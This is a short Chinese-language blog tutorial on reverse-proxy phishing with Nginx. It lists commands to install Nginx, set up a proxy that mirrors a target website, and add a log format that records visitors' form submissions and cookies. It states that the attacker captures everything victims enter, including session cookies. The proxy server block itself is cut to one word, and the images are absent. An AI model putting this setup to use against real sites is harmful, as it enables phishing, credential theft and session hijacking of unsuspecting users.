Nginx反向代理钓鱼
前言:Nginx反向代理的流程,根据Nginx反向代理配置,把访问者的请求转发给设置好的目标服务器,目标服务器接收请求后把资源转发给Nginx反向代理服务器,再由Nginx反向代理服务器转发给访问者
简介

环境准备
- Linux Ubuntu VPS
 - 安装Nginx
 
1  | sudo apt-get install nginx -y  | 
- 启动Nginx
 
1  | service nginx start  | 
配置反向代理
- 新建反向代理配置文件
 
1  | vim /etc/nginx/sites-enabled/reverse-proxy.conf  | 
- 配置
 
1  | server  | 
- 编辑Nginx配置文件
 
1  | vim /etc/nginx/nginx.conf  | 
- 找到这两行
 
1  | include /etc/nginx/mime.types;  | 
在这两行下面添加2句
1  | log_format testLog escape=json '$request_filename $http_x_forwarded_for $fastcgi_script_name $document_root $request_body' $http_cookie;  | 
- 重启Nginx
 
1  | service nginx restart  | 
效果
- 目标网站
 

- 这是攻击者的Nginx反向代理服务器看到的页面
 

- 如果受害者在攻击者的这个Nginx反向代理服务器的页面输入表单,所有输入,cookie session都会被攻击者截获,可在日志查看!
 


本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 X1ly?S!
 评论


